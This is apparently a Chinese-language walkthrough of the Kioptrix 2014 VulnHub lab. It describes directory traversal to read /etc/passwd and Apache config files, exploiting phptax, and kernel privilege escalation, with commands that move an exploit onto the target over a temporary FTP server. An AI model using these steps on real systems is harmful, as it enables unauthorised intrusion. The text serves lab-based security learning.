zoukankan      html  css  js  c++  java
  • kioptrix-5(2014)

    https://www.vulnhub.com/entry/kioptrix-2014-5,62/

    信息收集

    image-20210417213933544

    web 渗透

    扫目录,80 端口没扫除什么值得注意的内容。而在 8080 端口扫出很多 403。

    image-20210417220946627

    卡住了,tcp、udp 都扫了,没见到有效的。难道要突破防火墙?或者说直接利用这些存在的模块?

    前期交互都不成功,没一点思路了,先看看靶场描述,再看看 writeup。

    看了 writeup 之后,发现在 80 端口下的主页注释中存在提示的。

    image-20210420143809720

    pchart cms

    image-20210417223003064

    尝试搜索 exp

    image-20210417223429079

    image-20210417223402369

    发现有一个有用的目录遍历的漏洞。直接利用。

    还好有漏洞,这个页面功能太多,要是手工测试的话可能有点耗时。

    image-20210417223753832

    读取 /etc/passwd

    image-20210417223712343

    访问 8080 端口被禁止,应该想到是 apache 配置问题,所以接下来的思路是尝试访问 apache 配置文件。

    读取 apache 配置 httpd.conf。位于 /usr/local/etc/apache22/httpd.conf 。因为此处为 freebsd 系统,和通常 linux 存放位置不同。

    image-20210417225001917

    phptax cms

    构造合适的 user-agent 头部,访问 8080 端口。

    image-20210417225424998

    继续尝试搜索 exp

    image-20210417230000066

    image-20210417225944360

    image-20210417225911612

    提权

    收集提权信息

    image-20210418104258218

    image-20210418104430350

    image-20210418104349434

    image-20210418104552829

    image-20210418104631434

    # php session 文件
    /var/tmp/sess_o35rfviapg9sm7iu3ol0mkvjh7
    
    内核漏洞

    image-20210420130327225

    发现 28718.c 是有效的

    # 主机上搭建临时 ftp 服务器
    python3 -m pyftpdlib
    # 靶机通过命令下载
    ftp ftp://192.168.200.128:2121/28718.c
    

    编译运行,获取到 root

    image-20210420130912120

  • 相关阅读:
    leetcode 2 Add Two Numbers
    log4j2 springboot 特点与使用方法
    数据类型和运算符
    初识Java
    《梦断代码》阅读笔记02
    《梦断代码》阅读笔记01
    场景调研
    【站立会议】第九天
    【站立会议】第八天
    【站立会议】第七天
  • 原文地址:https://www.cnblogs.com/starrys/p/14680986.html
Copyright © 2011-2022 走看看